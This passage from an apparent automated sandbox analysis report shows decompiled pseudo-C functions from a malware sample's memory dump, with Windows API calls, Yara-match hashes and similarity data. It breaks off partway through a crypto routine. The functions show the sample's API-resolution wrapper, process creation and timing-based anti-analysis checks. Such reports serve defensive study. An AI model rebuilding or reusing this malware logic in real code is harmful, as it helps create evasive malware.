            • Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
            • Instruction ID: a31c2487d958de86685633fd431b3ef9c8f0d30197873f4edf114e6b439d7a00
            • Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
            • Instruction Fuzzy Hash: A2015EB5D4020DBBDB10EBA5DC82FDEB7799B54308F0041AAE908A7281F634EB54CB95
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00419F84, Relevance: 1.5, APIs: 1, Instructions: 46filenativeCOMMON
            Download Yara Rule
            C-Code - Quality: 41%
            			E00419F84(void* __ebx, void* __eflags, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				void* _v117;
				void** __esi;
				void* __ebp;
				long _t35;
				void* _t48;

				asm("std");
				if(__eflags != 0) {
					_t29 = _a4;
					_t4 = _t29 + 0xc40; // 0xc40
					E0041AB30(_t48, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
					_t35 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
					return _t35;
				} else {
					__edi =  *(__ebx - 0xe) * 0xffffff85;
					_pop(ss);
					asm("repe pop ebx");
					__eflags = __bh;
					__ebp = __esp;
					__eax = _a8;
					__esi =  &(_a8[0x311]);
					__eax = E0041AB30(__edi, _a8, __esi,  *((intOrPtr*)(__eax + 0x10)), 0, 0x29);
					_t20 =  &_a44; // 0x4148ea
					__eax = _a40;
					__eax = _a28;
					__eax = _a16;
					__eax =  *( *__esi)(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40,  *_t20, __esi, __ebp);
					_pop(__esi);
					_pop(__ebp);
					return _a16;
				}
			}








            0x00419f84
            0x00419f85
            0x00419f33
            0x00419f3f
            0x00419f47
            0x00419f7d
            0x00419f81
            0x00419f87
            0x00419f87
            0x00419f8b
            0x00419f8c
            0x00419f8e
            0x00419f91
            0x00419f93
            0x00419f9f
            0x00419fa7
            0x00419fac
            0x00419faf
            0x00419fbd
            0x00419fc9
            0x00419fd5
            0x00419fd7
            0x00419fd8
            0x00419fd9
            0x00419fd9

            APIs
            • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419F7D
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: CreateFile
            • String ID:
            • API String ID: 823142352-0
            • Opcode ID: 109b8b15c0f3a96ea266e8b2be412142e2e63ab973e528af39710352aca04b7b
            • Instruction ID: 806c5cbf8416d0edd4430d3c78efeca276bf835534545846d60436d6be786da4
            • Opcode Fuzzy Hash: 109b8b15c0f3a96ea266e8b2be412142e2e63ab973e528af39710352aca04b7b
            • Instruction Fuzzy Hash: E601D2B2211108AFCB18CF99DC95EEB77A9EF8C354F158249FA0DA7241C634E851CBA4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00419F2A, Relevance: 1.5, APIs: 1, Instructions: 43filenativeCOMMON
            Download Yara Rule
            C-Code - Quality: 64%
            			E00419F2A(void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				void* _v117;
				long _t23;
				void* _t35;

				asm("lodsb");
				asm("adc esp, edi");
				_t17 = _a4;
				_t4 = _t17 + 0xc40; // 0xc40
				E0041AB30(_t35, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t23;
			}






            0x00419f2c
            0x00419f2d
            0x00419f33
            0x00419f3f
            0x00419f47
            0x00419f7d
            0x00419f81

            APIs
            • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419F7D
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: CreateFile
            • String ID:
            • API String ID: 823142352-0
            • Opcode ID: 19ebbe29606071f2a955f4a78693b8cd1e330b947aeda67dce1b63b862adc39a
            • Instruction ID: b52a10880585f80ea1b07826ec03a1f01c2fedc779ae387f581daa47db65c9ed
            • Opcode Fuzzy Hash: 19ebbe29606071f2a955f4a78693b8cd1e330b947aeda67dce1b63b862adc39a
            • Instruction Fuzzy Hash: 9201F2B2211108BFCB08CF98DC91EEB37AAAF8C354F158208FA0DD3241C630E811CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00419F30, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00419F30(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AB30(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





            0x00419f3f
            0x00419f47
            0x00419f7d
            0x00419f81

            APIs
            • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419F7D
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: CreateFile
            • String ID:
            • API String ID: 823142352-0
            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
            • Instruction ID: 961861021b5599f6e321fa2eb4d652485a26ebd9b99d875dc12ce75f1520402c
            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
            • Instruction Fuzzy Hash: 3DF0BDB2215208ABCB08CF89DC95EEB77ADAF8C754F158248BA0D97241C630F8518BA4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0041A110, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0041A110(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AB30(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





            0x0041a11f
            0x0041a127
            0x0041a149
            0x0041a14d

            APIs
            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD04,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 0041A149
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: AllocateMemoryVirtual
            • String ID:
            • API String ID: 2167126740-0
            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
            • Instruction ID: 37a8c631670896842b218247a062c4f669cdd6b33082669530ec9f00ac69b820
            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
            • Instruction Fuzzy Hash: 2BF015B2210208ABCB14DF89CC81EEB77ADAF88754F118249BE0897241C630F811CBA4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0041A05B, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
            Download Yara Rule
            C-Code - Quality: 82%
            			E0041A05B() {
				long _t8;
				void* _t11;

				_pop(es);
				_t5 =  *0x555F0254;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041AB30(_t11,  *0x555F0254, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose( *0x555F0258); // executed
				return _t8;
			}





            0x0041a05b
            0x0041a063
            0x0041a066
            0x0041a06f
            0x0041a077
            0x0041a085
            0x0041a089

            APIs
            • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 0041A085
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: Close
            • String ID:
            • API String ID: 3535843008-0
            • Opcode ID: 5b7c73c9f807f42f9026c9b9283455d71ed9715c54bb353aab4b7b1ae33ddb17
            • Instruction ID: b6d8d824f7d908f639a0f2e2eefe4072702478d85f8c65a7a59f01eac9c11e0d
            • Opcode Fuzzy Hash: 5b7c73c9f807f42f9026c9b9283455d71ed9715c54bb353aab4b7b1ae33ddb17
            • Instruction Fuzzy Hash: 10E0C2762002006BD710EBD8CC45FD77769EF48760F14409ABE0C5B242C530FA1087E0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0041A060, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0041A060(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041AB30(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





            0x0041a063
            0x0041a066
            0x0041a06f
            0x0041a077
            0x0041a085
            0x0041a089

            APIs
            • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 0041A085
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: Close
            • String ID:
            • API String ID: 3535843008-0
            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
            • Instruction ID: 6cd8388973e83edfd6cfca07806e1d74deb588f8289630df2fc4ecf908b9aac5
            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
            • Instruction Fuzzy Hash: 48D01776200214ABD710EB99CC85FE77BADEF48760F154599BA189B242C530FA1086E0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00409A90, Relevance: .1, Instructions: 92COMMON
            Download Yara Rule
            C-Code - Quality: 93%
            			E00409A90(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407E80(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00408090( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041B9E0( &_v284, 0x104);
						E0041C050( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DC0(E00414D60(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe045
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080C0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408140(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















            0x00409a9b
            0x00409aa3
            0x00409aa5
            0x00409aaa
            0x00409aaf
            0x00409ac2
            0x00409ac7
            0x00409ad0
            0x00409adc
            0x00409aef
            0x00409af4
            0x00409af7
            0x00409b00
            0x00409b12
            0x00409b17
            0x00409b1c
            0x00000000
            0x00000000
            0x00409b1e
            0x00409b22
            0x00000000
            0x00000000
            0x00409b24
            0x00000000
            0x00409b22
            0x00409b26
            0x00409b29
            0x00409b2f
            0x00409b31
            0x00409b3c
            0x00409b41
            0x00409b44
            0x00409b51
            0x00409b5c
            0x00409b5e
            0x00409b64
            0x00409b68
            0x00409b6b
            0x00409b6b
            0x00409b72
            0x00409b75
            0x00409b7a
            0x00409b87
            0x00409ab6
            0x00409ab6
            0x00409ab6

            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0327286b03ad3413f637a2475f25f286d9bf62369b9ecfde997da3914e589c74
            • Instruction ID: 432e1ce9d525f57aefaca7daa4fe6280bf22d9d084bd04ba996dfdd8e8b53d12
            • Opcode Fuzzy Hash: 0327286b03ad3413f637a2475f25f286d9bf62369b9ecfde997da3914e589c74
            • Instruction Fuzzy Hash: 4F210CB2D4020857CB25D665AD42BEF737CAB54318F04017FE949A3182F638BE49CBA5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004082E8, Relevance: 1.6, APIs: 1, Instructions: 57threadwindowCOMMON
            Download Yara Rule
            C-Code - Quality: 82%
            			E004082E8(signed int __eax, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t14;
				int _t15;
				long _t24;
				int _t29;
				void* _t32;
				void* _t34;
				signed int _t39;

				_t39 = __eax | 0x557fdd9d;
				_t32 = _t34;
				_v68 = 0;
				E0041BA30( &_v67, 0, 0x3f);
				E0041C5D0( &_v68, 3);
				_t14 = E0040ACD0(_t39, _a4 + 0x1c,  &_v68); // executed
				_t15 = E00414E20(_a4 + 0x1c, _t14, 0, 0, 0xc4e7b6d6);
				_t29 = _t15;
				if(_t29 != 0) {
					_t24 = _a8;
					_t15 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
					_t41 = _t15;
					if(_t15 == 0) {
						_t15 =  *_t29(_t24, 0x8003, _t32 + (E0040A460(_t41, 1, 8) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}












            0x004082ec
            0x004082f1
            0x004082ff
            0x00408303
            0x0040830e
            0x0040831e
            0x0040832e
            0x00408333
            0x0040833a
            0x0040833d
            0x0040834a
            0x0040834c
            0x0040834e
            0x0040836b
            0x0040836b
            0x0040836d
            0x00408372

            APIs
            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: MessagePostThread
            • String ID:
            • API String ID: 1836367815-0
            • Opcode ID: 05f4e58a5365db206d21f70323806121c7b87a77a01f91d2595b68110f42e6d2
            • Instruction ID: a70eefb2abaac0826ae06ec5004ba02d0de9786fabd3260031416989eb0352de
            • Opcode Fuzzy Hash: 05f4e58a5365db206d21f70323806121c7b87a77a01f91d2595b68110f42e6d2
            • Instruction Fuzzy Hash: EF01D831A803287BE720A6959C43FFE772C6F40F54F04401AFF04BA1C1E6E9690547EA
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
            Download Yara Rule
            C-Code - Quality: 82%
            			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041BA30( &_v67, 0, 0x3f);
				E0041C5D0( &_v68, 3);
				_t12 = E0040ACD0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A460(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












            0x004082f0
            0x004082ff
            0x00408303
            0x0040830e
            0x0040831e
            0x0040832e
            0x00408333
            0x0040833a
            0x0040833d
            0x0040834a
            0x0040834c
            0x0040834e
            0x0040836b
            0x0040836b
            0x00000000
            0x0040836d
            0x00408372

            APIs
            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: MessagePostThread
            • String ID:
            • API String ID: 1836367815-0
            • Opcode ID: 0bfa4e74d4fa1a6ebe56472b901301c3cf37ddf70bb540388544bf445b19770a
            • Instruction ID: 1050077c77294267169ebb916dfae3a1405fb9879d8789690f6f999e3cf74240
            • Opcode Fuzzy Hash: 0bfa4e74d4fa1a6ebe56472b901301c3cf37ddf70bb540388544bf445b19770a
            • Instruction Fuzzy Hash: AD01D831A8032877E720A6959C03FFE771C6B40F54F044019FF04BA1C1E6A8690546EA
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0041A2AD, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
            Download Yara Rule
            C-Code - Quality: 37%
            			E0041A2AD(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
				void* _t22;
				void* _t34;
				intOrPtr* _t35;
				void* _t37;

				_t16 = _a4;
				_t2 = _t16 + 0xa14; // 0xfffde485
				_t3 = _t16 + 0xc80; // 0x409989
				_t35 = _t3;
				E0041AB30(0x8b554432, _a4, _t35,  *_t2, 0, 0x37);
				_t22 =  *((intOrPtr*)( *_t35))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52, _t34, _t37); // executed
				return _t22;
			}







            0x0041a2b3
            0x0041a2b6
            0x0041a2c2
            0x0041a2c2
            0x0041a2ca
            0x0041a304
            0x0041a308

            APIs
            • CreateProcessInternalW.KERNELBASE(00408C9D,00408CC5,00408A5D,00000010,00408CC5,00000044,?,?,?,00000044,00408CC5,00000010,00408A5D,00408CC5,00408C9D,00408D09), ref: 0041A304
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: CreateInternalProcess
            • String ID:
            • API String ID: 2186235152-0
            • Opcode ID: df580b1554d1e3ea92afbf7a552585fbfdf360a012c44bc75e1aa9c102fc972f
            • Instruction ID: 819a1958c094a80d2b0e91771e20bdfa770a83590c63e96e74ff8e6a1d6c0227
            • Opcode Fuzzy Hash: df580b1554d1e3ea92afbf7a552585fbfdf360a012c44bc75e1aa9c102fc972f
            • Instruction Fuzzy Hash: C101AFB2214108AFCB58DF99DC90EEB37AAAF8C754F158258FA0DD7240C630E851CBA4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0041A2B0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
            Download Yara Rule
            C-Code - Quality: 37%
            			E0041A2B0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
				void* _t22;
				void* _t33;
				intOrPtr* _t34;

				_t16 = _a4;
				_t2 = _t16 + 0xa14; // 0xfffde485
				_t3 = _t16 + 0xc80; // 0x409989
				_t34 = _t3;
				E0041AB30(_t33, _a4, _t34,  *_t2, 0, 0x37);
				_t22 =  *((intOrPtr*)( *_t34))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
				return _t22;
			}






            0x0041a2b3
            0x0041a2b6
            0x0041a2c2
            0x0041a2c2
            0x0041a2ca
            0x0041a304
            0x0041a308

            APIs
            • CreateProcessInternalW.KERNELBASE(00408C9D,00408CC5,00408A5D,00000010,00408CC5,00000044,?,?,?,00000044,00408CC5,00000010,00408A5D,00408CC5,00408C9D,00408D09), ref: 0041A304
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: CreateInternalProcess
            • String ID:
            • API String ID: 2186235152-0
            • Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
            • Instruction ID: effba7e3ecf22d2b5498edc93d928a4b139f794c0dd6b66c1fa7f39e44d5d65e
            • Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
            • Instruction Fuzzy Hash: 9501AFB2214108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0041A240, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0041A240(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AB30(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





            0x0041a24f
            0x0041a257
            0x0041a26d
            0x0041a271

            APIs
            • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A26D
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: FreeHeap
            • String ID:
            • API String ID: 3298025750-0
            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
            • Instruction ID: 8b4701b4f03220052e2b3b5ed4c672ef58e2eb60ff823c8fb6afa074398e137c
            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
            • Instruction Fuzzy Hash: DCE04FB12102046BD714DF59CC45EE777ADEF88750F014559FE0857241C630F910CAF0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0041A200, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0041A200(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041AB30(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





            0x0041a217
            0x0041a22d
            0x0041a231

            APIs
            • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A22D
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
            • Instruction ID: 4224f920e4464a65d08b1d76aaa125f94db740d8927d38e6c7d6b62f4195d12c
            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
            • Instruction Fuzzy Hash: 58E012B1210208ABDB14EF99CC41EA777ADAF88664F118559BA085B242C630F9118AB0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0041A3A0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0041A3A0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AB30(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





            0x0041a3ba
            0x0041a3d0
            0x0041a3d4

            APIs
            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A3D0
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: LookupPrivilegeValue
            • String ID:
            • API String ID: 3899507212-0
            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
            • Instruction ID: 9e479b2eaf60326b59b5a15a73b63e8f9b290ab663b6f1255dfa49a1ae2fc0e3
            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
            • Instruction Fuzzy Hash: DFE01AB12002086BDB10DF49CC85EE737ADAF88650F018155BA0857241C934F8118BF5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0041A280, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0041A280(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AB30(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




            0x0041a283
            0x0041a29a
            0x0041a2a8

            APIs
            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A2A8
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: ExitProcess
            • String ID:
            • API String ID: 621844428-0
            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
            • Instruction ID: ec4c192c261470033b7d3fff11050ba2ce0bed15fbfecc5592b4580303735d53
            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
            • Instruction Fuzzy Hash: 29D017726142187BD620EB99CC85FD777ACDF487A0F0181A9BA1C6B242C531BA108AE1
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Function 00409E40, Relevance: 1.7, Strings: 1, Instructions: 423COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 73%
            			E00409E40(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
